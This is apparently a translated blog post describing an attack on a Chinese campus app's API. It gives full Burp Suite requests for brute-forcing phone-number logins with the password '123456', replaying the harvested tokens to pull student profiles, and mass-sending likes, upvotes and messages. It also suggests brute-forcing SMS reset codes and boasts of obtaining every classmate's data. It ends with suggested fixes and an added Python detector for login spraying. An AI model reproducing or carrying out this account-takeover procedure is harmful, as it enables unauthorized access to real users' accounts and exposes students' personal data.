I actually discovered this vulnerability a long time ago, but I had been busy studying Metasploit and never found time to write it up. Recently I got tired of studying, so I figured I'd play with something simple instead.
Batch-scanning common mobile number prefixes for weak passwords: as of publication, 66 users were found to be using weak passwords.
Scanning with Burp Suite's Intruder module:
POST section
POST /Account/Login/index HTTP/1.1
Host: 7.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 29
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/538.00 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=y5673ws742395bjuk33fg3267h78lbeccd

phone=§18812345678§&password=123456
When the password is wrong, the Response content is as follows:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 14:45:46 GMT
Content-Type: application/json; charset=utf8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200 OK
Via: 1527
Content-Length: 94

{"meta":{"code":"401","message":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef\u3002"},"data":[]}
When the password is correct, the Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 15:15:00 GMT
Content-Type: application/json; charset=utf8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200 OK
Via: 15146
Content-Length: 325

{"meta":{"code":"200","message":"\u6210\u529f"},"data":{"userid":"7181","name":"\u738b\*****","image":"http:\/\/dxever.s3.sinaapp.com\/myfiles\/*****.jpg","schoolcode":"412","type":"normal","schoolname":"\u5927\u8fde\u5de5\u4e1a\u5927\u5b66","channel":"","token":"5339ed49225be92b97de8dcb560*****"}}
Export all of the above results in batch, use a regular expression in Notepad++ to pull out every "token" field, set it as the Payload in Burp Suite, and send the requests in batch:
POST /index.php/User/UserRebuild/getUserInfo HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 38
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5246sjox6q0032b8e5c21b4dea

token=$b986a358d4c02fef91b58f4de9******$
This yields the student data:
{"meta":{"code":200,"message":"\u6210\u529f"},"data":{"userData":{"name":"\u9ad8\*****\*****","image":"http:\/\/dxever.s3.sinaapp.com\/*****.jpg","sex":"\u5973","userid":"22215","bgImage":null,"grade":"2017\u7ea7","college":"\u827a\u672f\u8bbe\u8ba1\u5b66\u9662","major":""},"userInfo":{"hometown":"\u5c1a\u672a\u586b\u5199","club":"\u5c1a\u672a\u586b\u5199","circle":[],"dorm":"\u5c1a\u672a\u586b\u5199","constellation":"\u5c1a\u672a\u586b\u5199","hobby":"\u5c1a\u672a\u586b\u5199","love":"\u5c1a\u672a\u586b\u5199","writeline":"\u5c1a\u672a\u586b\u5199","channel":"cpc_22215"},"numInfo":["0","1","1","1",0,0],"album":[],"usertype":"normal","channel":""}}
Decoding the Unicode escapes gives:
{"meta":{"code":200,"message":"成功"},"data":{"userData":{"name":"高**","image":"http:\/\/dxever.s3.sinaapp.com\/*****.jpg","sex":"女","userid":"22215","bgImage":null,"grade":"2017级","college":"艺术设计学院","major":""},"userInfo":{"hometown":"尚未填写","club":"尚未填写","circle":[],"dorm":"尚未填写","constellation":"尚未填写","hobby":"尚未填写","love":"尚未填写","writeline":"尚未填写","channel":"cpc_22215"},"numInfo":["0","1","1","1",0,0],"album":[],"usertype":"normal","channel":""}}
Export the data in batch.
What use is this data?
1. Farming likes on "你真好看" ("You Look So Good").
Set the Payload and send requests in batch:
POST /Beautiful/Index/thinkBeautiful HTTP/1.1
Host: 7.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 46
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=d99fadb5ed37731c6ce1be189cf257dc

token=$b986a358d4c02fef91b58f4de9******$&bid=?
// bid is taken from captured traffic
If you control enough users, you'll be ranked first within a few seconds.
2. Batch-upvoting posts on the confession wall.
POST /index.php/CircleForum/ConfessionWowRebuild/momentsendwow HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 56
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5005b0866b4032b8e5c21*****

token=866891c39c7b2334bce7c10ad8c*****&mid=?&type=up
// mid is taken from captured traffic
3. Batch-sending "I love you" to 黄骆俊杰.
POST /index.php/Whisper/WhisperSend/sendwhisper HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 94
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5005b0866b4032b8e5c21*****

token=866891c39c7b2334bce7c10ad8c*****&his_id=94&content=%E6%88%91%E7%88%B1%E4%BD%A0&type=text
// his_id is taken from captured traffic
4. Flooding the screen at will during the assembly. ......
5. Cracking any chat room's password. ......
Since the server puts no limit on the number of requests per IP per unit of time, one can surmise:
1. Brute-forcing the 6-digit SMS verification code to reset anyone's password.
2. Posting ads in bulk.
......
I don't know whether the dev team will fix this vulnerability. If "大学印象" (University Impressions) expands its customer base in the future, I hope the dev team won't dismiss "small vulnerabilities" like this one. The WeChat client has the same vulnerability; the only difference is that capturing HTTPS traffic requires installing a CA certificate and decoding.
Suggested fixes:
1. Add a CAPTCHA to the password reset flow.
2. Limit concurrent requests per IP.
3. Require a CAPTCHA on frequent operations.
4. Disallow weak passwords. (A few of the gurus on the dev team use weak passwords too...)
Follow-up: I found more vulnerabilities and managed to obtain the information of every student in my year, including 教务处 (Academic Affairs Office) passwords. I have no idea how it reached my counselor; I was one step away from being "invited for tea"...
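One way the server side could have noticed the login scan described above, and the kind of abuse that suggestions 2 and 3 are meant to stop: added example code, not from the post or from the app's developers. The log format, IP addresses, phone numbers and thresholds are constructed; the only detail taken from the post is that the login endpoint answers HTTP 200 for both outcomes and signals failure only through the JSON "code" field.

```python
"""Flag password spraying / brute force against /Account/Login/index from access-log
lines. The log format, IPs, phone numbers and thresholds below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed format: <ip> <ISO timestamp> <method> <path> <status> code=<json code> phone=<n>
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ts>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) '
    r'code=(?P<code>\d{3}) phone=(?P<phone>\d+)$')
EPOCH = datetime(1970, 1, 1)

SAMPLE_LOG = """\
203.0.113.9 2018-03-22T14:45:40 POST /Account/Login/index 200 code=401 phone=18812345678
203.0.113.9 2018-03-22T14:45:41 POST /Account/Login/index 200 code=401 phone=18812345679
203.0.113.9 2018-03-22T14:45:41 POST /Account/Login/index 200 code=200 phone=18812345680
203.0.113.9 2018-03-22T14:45:42 POST /Account/Login/index 200 code=401 phone=18812345681
203.0.113.9 2018-03-22T14:45:43 POST /Account/Login/index 200 code=401 phone=18812345682
198.51.100.4 2018-03-22T14:45:45 POST /Account/Login/index 200 code=401 phone=18899990000
198.51.100.4 2018-03-22T14:55:46 POST /Account/Login/index 200 code=200 phone=18899990000
"""

def parse(log):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["ts"] = datetime.fromisoformat(entry["ts"])
            yield entry

def detect_spraying(log, window=timedelta(minutes=5), max_accounts=3, max_attempts=10):
    """Alert on IPs that, inside one fixed-size window, try more than `max_accounts`
    distinct phone numbers or more than `max_attempts` logins in total.
    HTTP status is useless here (always 200), so success is judged by the JSON code."""
    per_ip = defaultdict(lambda: defaultdict(lambda: {"phones": set(), "n": 0, "ok": 0}))
    for e in parse(log):
        if e["path"] != "/Account/Login/index":
            continue
        bucket = (e["ts"] - EPOCH).total_seconds() // window.total_seconds()
        w = per_ip[e["ip"]][bucket]
        w["phones"].add(e["phone"])
        w["n"] += 1
        w["ok"] += e["code"] == "200"
    alerts = {}
    for ip, buckets in per_ip.items():
        for w in buckets.values():
            if len(w["phones"]) > max_accounts or w["n"] > max_attempts:
                alerts[ip] = {"accounts": len(w["phones"]), "attempts": w["n"], "successes": w["ok"]}
    return alerts

if __name__ == "__main__":
    print(detect_spraying(SAMPLE_LOG))
```

Fixed-size buckets can miss a burst that straddles a boundary; a sliding window per IP is tighter but the grouping logic is the same.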
2 comments
This is seriously awesome!!!
Badass, bro